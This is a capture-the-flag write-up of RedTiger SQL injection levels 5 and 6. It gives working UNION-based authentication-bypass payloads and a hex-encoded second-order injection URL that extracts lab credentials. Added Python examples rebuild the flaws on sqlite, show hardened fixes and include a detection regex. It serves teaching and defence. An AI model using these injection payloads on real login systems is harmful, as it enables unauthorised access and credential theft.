Level 5
The hint says the password is md5-hashed, and that you should watch the login errors.
Random username and random password: the response is User not found!
Username ' or 1=1 #, random password: the response is Login failed!
So there are two layers of checks; the first only tests whether the query returns a row.
A blind guess (?) at the backend logic:
if (select xxx from xxx where username='pay1' returns a row) {
    psw = (select password from xxx where username='pay1');  ※
    if (md5(pay2) == psw) { logged in }
}
Idea: make the statement at ※ select md5(pay2).
1. First layer
Enter, in turn,
select username,password from xxx where username='' union select 1 #
select username,password from xxx where username='' union select 1,2 #
The responses are, respectively,
Login failed!
User not found!
So the payload ' union select 1,2 # gets past it.
2. Second layer
select password from xxx where username='' union select 1,md5('fuck') #
select password from xxx where username='' union select md5('fuck'),2 #
Try both; in practice the first one gets past it.
Final payload: username ' union select 1,md5('fuck') #, password fuck
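To make the two-stage logic concrete from the defender's side, here is an added example (mine, not the writeup's or the lab's code) that rebuilds the inferred flow on an in-memory sqlite database and puts the fixed version beside it. The schema, the user "admin" and its password are constructed; an md5() SQL function is registered because sqlite has none; and the writeup's MySQL "#" comment is swapped for sqlite's "-- " so the same payload parses. The vulnerable path reproduces the two distinct error strings and the UNION-supplied hash; the hardened path binds the parameter, stores a salted PBKDF2 hash instead of unsalted md5, compares in constant time and returns one generic message for both failure cases.

```python
import hashlib
import hmac
import os
import sqlite3


def make_db():
    """Constructed demo database: one user, plus an md5() function so the payload runs on sqlite."""
    conn = sqlite3.connect(":memory:")
    conn.create_function("md5", 1, lambda s: hashlib.md5(str(s).encode()).hexdigest())
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, salt BLOB, pw_hash BLOB)")
    salt = os.urandom(16)
    conn.execute(
        "INSERT INTO users VALUES (?, ?, ?, ?)",
        (
            "admin",
            hashlib.md5(b"correct horse").hexdigest(),  # unsalted md5 read by the vulnerable path
            salt,
            hashlib.pbkdf2_hmac("sha256", b"correct horse", salt, 100_000),  # read by the fixed path
        ),
    )
    conn.commit()
    return conn


def vulnerable_login(conn, username, password):
    """The two-stage logic the writeup infers: string-built lookup, then an md5 compare.
    Two different error strings leak which stage rejected the attempt."""
    sql = f"SELECT username, password FROM users WHERE username='{username}'"
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:  # e.g. a UNION with the wrong column count
        return "Login failed!"
    if row is None:
        return "User not found!"
    # Stage two trusts whatever stage one returned, so a UNION that supplies
    # md5(<value the sender knows>) as the password column satisfies it.
    if hashlib.md5(password.encode()).hexdigest() == row[1]:
        return f"Welcome {row[0]}"
    return "Login failed!"


def hardened_login(conn, username, password):
    """Bound parameter, salted slow hash, constant-time compare, one generic message."""
    row = conn.execute(
        "SELECT username, salt, pw_hash FROM users WHERE username = ?", (username,)
    ).fetchone()
    if row is None:
        # Do the same work for unknown users so response time does not reveal existence.
        hashlib.pbkdf2_hmac("sha256", password.encode(), b"\x00" * 16, 100_000)
        return "Invalid credentials"
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), row[1], 100_000)
    if hmac.compare_digest(candidate, row[2]):
        return f"Welcome {row[0]}"
    return "Invalid credentials"


# The writeup's level 5 payload, with MySQL's '#' comment replaced by sqlite's '-- '.
PAYLOAD_USER = "' union select 1,md5('fuck') -- "
PAYLOAD_PASS = "fuck"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", vulnerable_login(db, PAYLOAD_USER, PAYLOAD_PASS))
    print("hardened:  ", hardened_login(db, PAYLOAD_USER, PAYLOAD_PASS))
```

The single "Invalid credentials" string matters as much as the bound parameter: the writeup found the two-stage structure only because the two stages answered differently.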
Level 6 (second-order injection + hex bypass)
The usual routine, order by then union select, and then you get stuck at this step:
?user=-1 union select 1,2,3,4,5 # returns User not found
I tried replacing each of 1,2,3,4,5 with the given username 'deddlef'; every attempt returned User not found, so I guessed that quotes are filtered. Converting deddlef to hex gives 0x646564646c6566; substituting that for each of 1,2,3,4,5 in turn, position 2 gave a normal response.
So a second-order injection is possible at position 2 (the statements below actually have to be hex-encoded):
' union select 1,2,3,4,5#
' union select 1,Username,3,Password,5 from level6_users where status=1 limit 0,1#
Final payload:
http://redtiger.labs.overthewire.org/level6.php?user=-1 union select 1,0x2720756e696f6e2073656c65637420312c557365726e616d652c332c50617373776f72642c352066726f6d206c6576656c365f7573657273207768657265207374617475733d31206c696d697420302c3123,3,4,5 #
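An added example (mine, not the writeup's or the lab's code) that shows why the quote filter inferred above does not stop this, and what stops it instead. It decodes the hex literal from the final payload with plain bytes.fromhex, which is what MySQL does when a 0x literal is used where a string is expected, and checks that a filter looking for a raw quote passes the encoded form but would have rejected the decoded one. It then models the second-order step: the value column 2 carries is pasted into a second statement by string formatting (returned as text, to show the value has become code) versus bound as a parameter on a constructed sqlite table named as in the writeup, where it is matched literally and finds no row. The looks_injected heuristic at the end is a log-review check I added; the table contents and the regex thresholds are my assumptions.

```python
import re
import sqlite3

# Hex literal copied from the writeup's final level 6 URL (the value placed in column 2).
HEX_LITERAL = "0x2720756e696f6e2073656c65637420312c557365726e616d652c332c50617373776f72642c352066726f6d206c6576656c365f7573657273207768657265207374617475733d31206c696d697420302c3123"


def decode_mysql_hex(literal):
    """MySQL evaluates a 0x... literal in string context as the bytes it encodes,
    so the request never contains a quote character yet the value does."""
    if not literal.lower().startswith("0x"):
        raise ValueError("not a hex literal")
    return bytes.fromhex(literal[2:]).decode("utf-8")


def naive_quote_filter(value):
    """The check the writeup's failures suggest: reject the request if a raw quote is present."""
    return "'" not in value


def make_db():
    """Constructed demo table using the column and table names from the writeup."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE level6_users (Username TEXT, Password TEXT, status INTEGER)")
    conn.execute(
        "INSERT INTO level6_users VALUES (?, ?, ?)", ("deddlef", "constructed-secret", 1)
    )
    conn.commit()
    return conn


def build_second_query_vulnerable(username):
    """Second-order pattern: a value the first query returned is pasted into a new statement.
    Returned as text rather than executed; the point is that the value is now part of the SQL."""
    return f"SELECT Username, Password FROM level6_users WHERE Username='{username}'"


def second_query_hardened(conn, username):
    """Bound parameter: the same value is compared as a literal username and matches nothing."""
    return conn.execute(
        "SELECT Username, Password FROM level6_users WHERE Username = ?", (username,)
    ).fetchall()


# Log-review / WAF heuristic: long hex literals standing in for strings, or UNION SELECT.
INJECTION_RE = re.compile(r"\b0x[0-9a-f]{16,}\b|\bunion\s+select\b", re.IGNORECASE)


def looks_injected(param):
    return bool(INJECTION_RE.search(param))


if __name__ == "__main__":
    fragment = decode_mysql_hex(HEX_LITERAL)
    print("decoded :", fragment)
    print("filter passes hex form:", naive_quote_filter(HEX_LITERAL))
    print("filter passes decoded :", naive_quote_filter(fragment))
    print("vulnerable 2nd query  :", build_second_query_vulnerable(fragment))
    print("hardened 2nd query    :", second_query_hardened(make_db(), fragment))
```

The hex trick only defeats the first query's quote check; the actual damage happens because the second query is built the same unsafe way. Fixing the filter would not help, binding every query's parameters does.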
Afterword: SQL injection is great fun, even though I had to read the walkthrough for every level, sob.